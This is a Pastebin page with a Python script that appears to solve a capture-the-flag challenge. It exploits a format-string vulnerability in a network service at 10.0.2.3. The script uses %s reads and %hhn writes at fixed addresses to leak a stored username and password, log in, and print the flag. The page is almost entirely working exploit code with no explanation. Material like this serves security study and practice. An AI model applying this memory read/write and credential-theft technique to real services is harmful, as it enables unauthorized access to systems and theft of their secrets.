Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import telnetlib
- import struct
- import socket
- host = '10.0.2.3'
- port = 1111
- def recv_until(sock, term):
- b = ''
- while term not in b:
- b += sock.recv(1)
- return b
- def read_string(sock, addr):
- recv_until(sock, 'option: ')
- sock.send('1\n')
- sock.send(struct.pack('<I', addr) + '%4$s'+'\n')
- return recv_until(sock, '\n')
- def write_symbol(sock, addr, symbol):
- recv_until(sock, 'option: ')
- sock.send('1\n')
- format_str = '%0' + str(symbol-4) + 'd'
- sock.send(struct.pack('<I', addr) + format_str + '%4$hhn'+'\n')
- return recv_until(sock, '\n')
- def login(sock, username, password):
- recv_until(sock, 'option: ')
- sock.send('10\n')
- recv_until(sock, 'Username: ')
- sock.send(username + '\n')
- recv_until(sock, 'Password: ')
- sock.send(password + '\n')
- sock = socket.create_connection((host, port))
- sock.settimeout(5)
- write_symbol(sock, 0x0804A0FF, ord('@'))
- login(sock,'1','2')
- #say hello to user
- username = read_string(sock, 0x0804A080)[4:][:-1]
- print('username = %r' % username)
- # Say hello to Password
- password = read_string(sock, 0x0804A0FF)[5:][:-1]
- print('password = %r' % password)
- # Login
- login(sock, username, password)
- # Give a Kiss To The Flag
- flag = read_string(sock, 0x0804A185)
- print('flag = %r' % flag)
- #t = telnetlib.Telnet()
- #t.sock = sock
- #t.interact()
- sock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement